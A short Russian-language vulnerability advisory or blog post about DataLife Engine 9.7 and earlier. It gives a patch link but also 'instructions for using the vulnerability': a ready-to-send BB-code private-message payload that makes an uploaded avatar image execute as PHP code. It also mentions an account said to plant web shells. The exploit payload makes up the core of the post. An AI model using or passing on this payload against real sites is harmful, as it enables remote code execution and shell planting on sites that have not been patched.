Проблема: Недостаточная фильтрация данных в парсере шаблонов.
Ошибка в версии: 9.7 и все более ранние версии
Степень опасности: Высокая
Для исправления проблемы установите патч, с оффициального сайта http://dle-news.ru/
Инструкция по использованию уязвимости под катом.
В DLE уязвимость в обработке бб-кодов в ПМ.
При отправке ПМ вот с таким текстом:
[img]{include+file=\"engine/inc/include/init.php?a=[/img][img]&file_path=../../uploads/fotos&file_name=foto_123.gif\"}[/img]
файл foto_123.gif выполняется, как пхп код. А залить эту картинку, можно как аватар, например.
А ещё если у вас есть пользователь под ником wnet с имейлом super.wnet@ya.ru
Вас 100% уже взломали. Этот бот заливает шеллы с 2011 года.
Внимание! Данная статья была написана более полугода назад, актуальность материала и состояние жизни ссылок не гарантируется! Воспользуйтесь дополнительными параметрами для поиска необходимого вам контента! Приносим свои извинения...